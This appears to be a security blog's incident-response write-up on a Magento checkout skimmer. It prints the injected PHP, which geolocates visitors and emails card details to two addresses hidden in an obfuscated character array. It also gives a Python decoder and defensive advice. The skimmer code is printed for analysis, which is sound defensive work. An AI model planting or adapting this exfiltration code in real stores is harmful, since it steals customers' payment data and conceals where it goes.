Lately, we’ve uncovered and detailed many techniques being used against e-commerce platforms to steal sensitive information, mostly credit card numbers and login credentials. With the holiday season approaching, e-commerce platforms become an even more attractive target because of the increase in sales during the season.
In this incident response case, the attackers used server resources, more specifically the mail() function, to send all the sensitive data after assembling it in a very interesting way.
During our analysis, we identified the following malicious code added to the file ‘./app/code/core/Mage/Checkout/Model/Type/Onepage.php’:
$a = getenv('REMOTE_ADDR');
$a = json_decode(file_get_contents("hxxp://www(.)geoplugin(.)net/json(.)gp?ip={$a}"));
$datasend .= "Visit = ".$a->geoplugin_city." | ".$a->geoplugin_region." | ".$a->geoplugin_countryName."\n";
$binCC = substr($data['cc_number'], 0, 6);
$subject = "Verify Mag ".$data['cc_type']." ".$binCC." ".$a->geoplugin_countryName;
$headers = "MIME-Version: 1.0\n";
$ar = array("0"=>"h","1"=>"i","2"=>"a","3"=>"@","4"=>"s","5"=>"t","6"=>"p","7"=>"o","8"=>".","9"=>"m","10"=>"e","11"=>"g","12"=>"c","13"=>"r","14"=>"l","15"=>"n","16"=>"y","17"=>"b","18"=>"k","19"=>"u","20"=>"d");
$recipient = $ar["6"].$ar["7"].$ar["4"].$ar["5"].$ar["11"].$ar["0"].$ar["7"].$ar["4"].$ar["5"].$ar["1"].$ar["6"].$ar["3"].$ar["11"].$ar["9"].$ar["2"].$ar["1"].$ar["14"].$ar["8"].$ar["12"].$ar["7"].$ar["9"];
$sendd = $ar["6"].$ar["7"].$ar["4"].$ar["5"].$ar["3"].$ar["11"].$ar["10"].$ar["5"].$ar["2"].$ar["20"].$ar["20"].$ar["13"].$ar["8"].$ar["15"].$ar["10"].$ar["5"];
mail($recipient,$subject,$datasend,$headers);
mail($sendd,$subject,$datasend,$headers);
The code fetches geolocation information (IP address, country, region, city) and appends it to the variable $datasend, alongside the sensitive credit card data.
In addition, the attackers declared a set of characters in an array ($ar) and then carefully assembled, one indexed character at a time, the values assigned to the variables $recipient and $sendd: ‘postghostip(at)gmail.com’ and ‘post(at)getaddr.net’ respectively.
Once the strings are assembled and the attackers have all the information they need, they send it through the mail() function to the two addresses mentioned above.
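Addresses hidden this way can be recovered without ever executing the injected PHP by resolving the index chains statically. The Python decoder below is an added example (it is not part of the original post or of Magento); it embeds a constructed copy of the lookup array and index chains shown above, handles any array name or chain length, and reports which decoded variable each mail() call sends to.

```python
import re

# Constructed sample reproducing the obfuscation pattern from the injected
# Onepage.php code: a lookup array plus index chains that spell out strings.
SAMPLE = (
    '$ar=array("0"=>"h","1"=>"i","2"=>"a","3"=>"@","4"=>"s","5"=>"t","6"=>"p",'
    '"7"=>"o","8"=>".","9"=>"m","10"=>"e","11"=>"g","12"=>"c","13"=>"r","14"=>"l",'
    '"15"=>"n","16"=>"y","17"=>"b","18"=>"k","19"=>"u","20"=>"d");'
    '$recipient=$ar["6"].$ar["7"].$ar["4"].$ar["5"].$ar["11"].$ar["0"].$ar["7"].'
    '$ar["4"].$ar["5"].$ar["1"].$ar["6"].$ar["3"].$ar["11"].$ar["9"].$ar["2"].'
    '$ar["1"].$ar["14"].$ar["8"].$ar["12"].$ar["7"].$ar["9"];'
    '$sendd=$ar["6"].$ar["7"].$ar["4"].$ar["5"].$ar["3"].$ar["11"].$ar["10"].'
    '$ar["5"].$ar["2"].$ar["20"].$ar["20"].$ar["13"].$ar["8"].$ar["15"].$ar["10"].$ar["5"];'
    'mail($recipient,$subject,$datasend,$headers);mail($sendd,$subject,$datasend,$headers);'
)

ARRAY_RE = re.compile(r'\$(\w+)\s*=\s*array\((.*?)\)\s*;', re.S)   # $name=array(...);
PAIR_RE = re.compile(r'"(\d+)"\s*=>\s*"([^"]*)"')                    # "index"=>"char"
CHAIN_RE = re.compile(r'\$(\w+)\s*=\s*((?:\$\w+\["\d+"\]\s*\.?\s*)+);')  # $var=$t["i"].$t["j"]...;
REF_RE = re.compile(r'\$(\w+)\["(\d+)"\]')                           # one $table["index"] reference
MAIL_RE = re.compile(r'mail\(\s*\$(\w+)\s*,')                        # first argument of mail()


def parse_lookup_tables(src):
    """Map each PHP array name to its index -> character table."""
    return {name: dict(PAIR_RE.findall(body)) for name, body in ARRAY_RE.findall(src)}


def decode_chains(src):
    """Resolve every variable built by concatenating $table["index"] references."""
    tables = parse_lookup_tables(src)
    decoded = {}
    for var, chain in CHAIN_RE.findall(src):
        # Unknown table or index becomes '?' so a partial decode is still visible.
        parts = [tables.get(t, {}).get(i, '?') for t, i in REF_RE.findall(chain)]
        decoded[var] = ''.join(parts)
    return decoded


def mail_recipients(src):
    """Decoded first argument of each mail() call, in order of appearance."""
    decoded = decode_chains(src)
    return [decoded.get(v, '$' + v) for v in MAIL_RE.findall(src)]


if __name__ == '__main__':
    for var, value in decode_chains(SAMPLE).items():
        print(f'{var} = {value}')
    print('mail() targets:', mail_recipients(SAMPLE))
```

Point the same functions at the contents of a suspicious PHP file to list every mail() sink and its decoded destination before deciding what to block or report.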
This type of file modification is easy to detect if you have a File Integrity Monitoring system in place. It’s also very important to check your HTTP and FTP logs in order to identify the entry point and the vulnerability the attackers may be taking advantage of. Last but not least, we also recommend deploying a Website Firewall solution to prevent future attacks.